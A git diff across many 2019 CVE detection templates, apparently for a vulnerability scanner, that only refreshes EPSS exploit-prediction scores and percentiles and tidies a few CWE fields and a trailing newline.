b/http/cves/2019/CVE-2019-17538.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-17538 cwe-id: CWE-22 epss-score: 0.00838 - epss-percentile: 0.79928 + epss-percentile: 0.80152 cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 15c6832f31..efb526c61c 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-17558 cwe-id: CWE-74 - epss-score: 0.97543 - epss-percentile: 0.99991 + epss-score: 0.97527 + epss-percentile: 0.99987 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 6abec75f2e..d8289472c8 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -20,7 +20,7 @@ info: cve-id: 'CVE-2019-17574' cwe-id: CWE-639 epss-score: 0.14192 - epss-percentile: 0.94987 + epss-percentile: 0.95068 cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 0623bb2b0e..c69c255c38 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 - epss-score: 0.50347 - epss-percentile: 0.9709 + epss-score: 0.6101 + epss-percentile: 0.97407 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 806612ff4e..b846823210 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-1821 cwe-id: CWE-20 epss-score: 0.96882 - epss-percentile: 0.99577 + epss-percentile: 0.99596 cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index c190c882cb..4541e094de 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18371 cwe-id: CWE-22 - epss-score: 0.02272 - epss-percentile: 0.88207 + epss-score: 0.02855 + epss-percentile: 0.8955 cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index c391a13b40..693a6f5ef2 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-18393 cwe-id: CWE-22 epss-score: 0.00161 - epss-percentile: 0.52069 + epss-percentile: 0.5244 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 09fa772cd7..9566f0692f 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-18394 cwe-id: CWE-918 - epss-score: 0.5914 - epss-percentile: 0.97299 + epss-score: 0.65757 + epss-percentile: 0.97523 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml index fd9799d916..72a3601454 100644 --- a/http/cves/2019/CVE-2019-18665.yaml +++ b/http/cves/2019/CVE-2019-18665.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-18665 cwe-id: CWE-22 epss-score: 0.0855 - epss-percentile: 0.93623 + epss-percentile: 0.93722 cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index 09704a49b5..392620cc8f 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-18818 cwe-id: CWE-640 - epss-score: 0.88411 - epss-percentile: 0.98263 + epss-score: 0.88966 + epss-percentile: 0.98362 cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index ec442c5fd8..a0d204e801 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18922 cwe-id: CWE-22 - epss-score: 0.16768 - epss-percentile: 0.95348 + epss-score: 0.20454 + epss-percentile: 0.95785 cpe: cpe:2.3:o:alliedtelesis:at-gs950\/8_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index 37e513735a..f31fab6944 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-18957 cwe-id: CWE-79 - epss-score: 0.00247 - epss-percentile: 0.61933 + epss-score: 0.00375 + epss-percentile: 0.69611 cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 6d6f9b021b..2d6b7dc7c2 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-1898 cwe-id: CWE-425,CWE-285 - epss-score: 0.06482 - epss-percentile: 0.928 + epss-score: 0.07254 + epss-percentile: 0.93272 cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index a42be1d187..3e96c7625b 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-19134 cwe-id: CWE-79 epss-score: 0.00203 - epss-percentile: 0.57549 + epss-percentile: 0.57935 cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 1aef5731d3..a6c88fb3f1 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-19368 cwe-id: CWE-79 - epss-score: 0.00625 - epss-percentile: 0.76278 + epss-score: 0.00624 + epss-percentile: 0.76513 cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 7a29dfff3c..07a7b697b6 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-1943 cwe-id: CWE-601 epss-score: 0.03526 - epss-percentile: 0.90351 + epss-percentile: 0.90468 cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml index 01474400e2..82685c03ca 100644 --- a/http/cves/2019/CVE-2019-19781.yaml +++ b/http/cves/2019/CVE-2019-19781.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-19781 cwe-id: CWE-22 - epss-score: 0.97541 - epss-percentile: 0.9999 + epss-score: 0.97515 + epss-percentile: 0.99981 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml index 5b69c5c114..13732b4ba9 100644 --- a/http/cves/2019/CVE-2019-19824.yaml +++ b/http/cves/2019/CVE-2019-19824.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-19824 cwe-id: CWE-78 - epss-score: 0.96631 - epss-percentile: 0.99466 + epss-score: 0.96747 + epss-percentile: 0.99541 cpe: cpe:2.3:o:totolink:a3002ru_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index c30a944fb2..409f071ed9 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-19908 cwe-id: CWE-79 epss-score: 0.00622 - epss-percentile: 0.76214 + epss-percentile: 0.76475 cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index df11994ce1..0cfbd69898 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-19985 cwe-id: CWE-862 - epss-score: 0.08255 - epss-percentile: 0.93525 + epss-score: 0.1336 + epss-percentile: 0.94934 cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 2819373ab7..96377bf5c8 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-20085 cwe-id: CWE-22 - epss-score: 0.58096 - epss-percentile: 0.97276 + epss-score: 0.67701 + epss-percentile: 0.97575 cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index d703003ba2..0ffe3c2321 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-20141 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46269 + epss-percentile: 0.46599 cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index fac2df72fe..15e6b677e9 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-20183 cwe-id: CWE-434 epss-score: 0.0192 - epss-percentile: 0.87111 + epss-percentile: 0.8725 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 4524c6e47e..9d0738a9c0 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-20210 cwe-id: CWE-79 - epss-score: 0.00249 - epss-percentile: 0.62023 + epss-score: 0.00732 + epss-percentile: 0.7861 cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index 0ae86aa68e..6555e735c9 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-20224 cwe-id: CWE-78 - epss-score: 0.15573 - epss-percentile: 0.95195 + epss-score: 0.19183 + epss-percentile: 0.95673 cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index b0f741ba55..06b869dffc 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-20933 cwe-id: CWE-287 epss-score: 0.03713 - epss-percentile: 0.90575 + epss-percentile: 0.90691 cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index ca9fd6f2c0..73c2f19812 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2019-2578 - epss-score: 0.00815 - epss-percentile: 0.79635 + epss-score: 0.01062 + epss-percentile: 0.82496 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml index beaca84ef8..acd588debd 100644 --- a/http/cves/2019/CVE-2019-2579.yaml +++ b/http/cves/2019/CVE-2019-2579.yaml @@ -17,7 +17,7 @@ info: cvss-score: 4.3 cve-id: CVE-2019-2579 epss-score: 0.00493 - epss-percentile: 0.73168 + epss-percentile: 0.73452 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index 1f8ca48351..4084e68e84 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.9 cve-id: CVE-2019-2588 - epss-score: 0.10482 - epss-percentile: 0.94259 + epss-score: 0.08827 + epss-percentile: 0.93835 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 677d3d3e36..714cd9d870 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 - epss-score: 0.94746 - epss-percentile: 0.98945 + epss-score: 0.93837 + epss-percentile: 0.98851 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml index a001be2253..df074dea24 100644 --- a/http/cves/2019/CVE-2019-2725.yaml +++ b/http/cves/2019/CVE-2019-2725.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-2725 cwe-id: CWE-74 - epss-score: 0.97571 - epss-percentile: 0.99998 + epss-score: 0.97562 + epss-percentile: 0.99997 cpe: cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index da53d8eeb9..5367d72c6d 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 - epss-score: 0.97178 - epss-percentile: 0.99717 + epss-score: 0.97067 + epss-percentile: 0.99679 cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index 92af704750..2af0a8be02 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-2767 epss-score: 0.14972 - epss-percentile: 0.95103 + epss-percentile: 0.95181 cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index 5d3cadfaaf..9346feca51 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-3396 cwe-id: CWE-22 - epss-score: 0.97498 - epss-percentile: 0.9996 + epss-score: 0.97504 + epss-percentile: 0.99975 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 2626c86602..1a7d441da4 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-3398 cwe-id: CWE-22 - epss-score: 0.97342 - epss-percentile: 0.99829 + epss-score: 0.97326 + epss-percentile: 0.99837 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index 59dbfdc84c..f9765b5c77 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2019-3401 cwe-id: CWE-863 epss-score: 0.0055 - epss-percentile: 0.74576 + epss-percentile: 0.74866 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: # Turning the feature off will not affect existing filters and dashboards. # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. \ No newline at end of file +# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index f6f653ee44..0aa7130038 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-3402 cwe-id: CWE-79 - epss-score: 0.00238 - epss-percentile: 0.61147 + epss-score: 0.00254 + epss-percentile: 0.62858 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 9e44d8d3a8..44d5cae3ff 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-3403 cwe-id: CWE-863 - epss-score: 0.00379 - epss-percentile: 0.69498 + epss-score: 0.0055 + epss-percentile: 0.74866 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 30d168a8bb..24500f7159 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-3799 cwe-id: CWE-22 - epss-score: 0.0198 - epss-percentile: 0.87311 + epss-score: 0.0237 + epss-percentile: 0.88594 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 1540eb3410..f52ede0aff 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-3911 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.56537 + epss-percentile: 0.57042 cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index b48df5eab6..71119e72dd 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-3912 cwe-id: CWE-601 epss-score: 0.0016 - epss-percentile: 0.51912 + epss-percentile: 0.52294 cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index 959857279c..efb6969e1e 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -17,9 +17,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-3929 - cwe-id: CWE-79,CWE-78 - epss-score: 0.97438 - epss-percentile: 0.99911 + cwe-id: CWE-78,CWE-79 + epss-score: 0.97419 + epss-percentile: 0.99906 cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index 678f521075..097a55cf25 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-5127 cwe-id: CWE-78 - epss-score: 0.97404 - epss-percentile: 0.99879 + epss-score: 0.97433 + epss-percentile: 0.99921 cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index ca762267b4..f8b898798a 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -17,8 +17,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-5418 - epss-score: 0.97427 - epss-percentile: 0.99897 + cwe-id: CWE-22,NVD-CWE-noinfo + epss-score: 0.97445 + epss-percentile: 0.99932 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index ee3364ce0f..d6f1c44432 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-5434 cwe-id: CWE-502 epss-score: 0.28703 - epss-percentile: 0.9626 + epss-percentile: 0.96302 cpe: cpe:2.3:a:revive-sas:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 8ee57782c1..d6675b2cba 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-6112 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46438 + epss-percentile: 0.46767 cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 553ab1b2fa..a002a1479d 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.1 cve-id: CVE-2019-6340 cwe-id: CWE-502 - epss-score: 0.97369 - epss-percentile: 0.99849 + epss-score: 0.97478 + epss-percentile: 0.9996 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index d8e67ef730..971111686c 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-6715 epss-score: 0.23312 - epss-percentile: 0.95923 + epss-percentile: 0.95993 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index eefec8e909..8c72de22e0 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -20,7 +20,7 @@ info: cvss-score: 5.9 cve-id: CVE-2019-6799 epss-score: 0.13969 - epss-percentile: 0.94952 + epss-percentile: 0.95023 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 04b2218181..bc1fa2edf9 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-6802 cwe-id: CWE-74 epss-score: 0.00113 - epss-percentile: 0.44064 + epss-percentile: 0.44439 cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index c3acdeaf73..8b7fca3c41 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-7192 cwe-id: CWE-863 epss-score: 0.96645 - epss-percentile: 0.99471 + epss-percentile: 0.99501 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index 672f13dbd9..11c8003f2d 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-7219 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.43991 + epss-percentile: 0.4436 cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 67aeaeb7f0..a006951bbe 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-7238 epss-score: 0.97478 - epss-percentile: 0.99947 + epss-percentile: 0.9996 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 7941fd74d0..a843557a2f 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7254 cwe-id: CWE-22 - epss-score: 0.86088 - epss-percentile: 0.9813 + epss-score: 0.85014 + epss-percentile: 0.98136 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: 